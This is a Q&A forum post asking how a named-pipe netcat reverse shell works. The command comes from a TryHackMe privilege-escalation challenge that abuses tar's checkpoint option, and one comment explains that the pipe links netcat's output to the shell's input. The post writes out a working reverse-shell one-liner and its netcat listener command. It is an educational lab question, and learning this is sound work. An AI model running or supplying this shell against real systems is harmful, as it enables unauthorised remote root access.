Communities

Writing

Codidact Meta

The Great Outdoors

Photography & Video

Scientific Speculation

Cooking

Electrical Engineering

Judaism

Languages & Linguistics

$Mathematics$

tag:snake search within a tag

answers:0 unanswered questions

user:xxxx search by author id

score:0.5 posts with 0.5+ score

"snake oil" exact phrase

votes:4 posts with 4+ votes

created:<1w created < 1 week ago

post_type:xxxx type of post

Search help

Notifications

Mark all as read See all your notifications »

Q&A Meta

Q&A

Posts Tags Edits

Ask Question

Comments on Reverse shell with named pipe and netcat

Post

Reverse shell with named pipe and netcat

−0

This blog post describes a privilege escalation, exploiting tar's --checkpoint-action option. The privilege escalation is used to solve a TryHackMe challenge.

The root user calls tar via cron which causes a script with the following content to run (I adapted the script a bit):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f

I'm trying to wrap my head around the interaction between cat, sh, netcat, and the named pipe /tmp/f.

Here's my literal reading of the command:

Create a new named pipe at /tmp/f.
Write the contents of /tmp/f to an interactive shell.
Write the output of the shell to netcat.
The output of netcat is written to the named pipe /tmp/f.

After running the command and creating a listening netcat server locally with nc -lvnp 4445 I indeed got root access.

I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.

shell networking

posted over 2 years ago

CC BY-SA 4.0

2y ago

Matthias Braun‭

206 reputation 5 4 29 20

Raw

Markdown

History

is a duplicate

This question has been asked before and has already been answered. It should be marked as a duplicate.

Please enter the URL of the proposed duplicate in the details field below.

not constructive

This question cannot be answered in a way that is helpful to anyone. It's not possible to learn something from possible answers, except for the solution for the specific problem of the asker.

1 comment thread

Your hunch is right (1 comment)

elgonzo‭ wrote over 2 years ago · edited over 2 years ago

copy link

The purpose of the named pipe is just to connect the stdout of netcat to the stdin of bin/sh. That's basically all it does. Connecting stdout of bin/sh with stdin of netcat is done normally using |. This way a remote host can interact with the bin/sh shell through a netcat-managed connection. There are no further clever tricks or some advanced techniques involved that would call for more expansive explanations...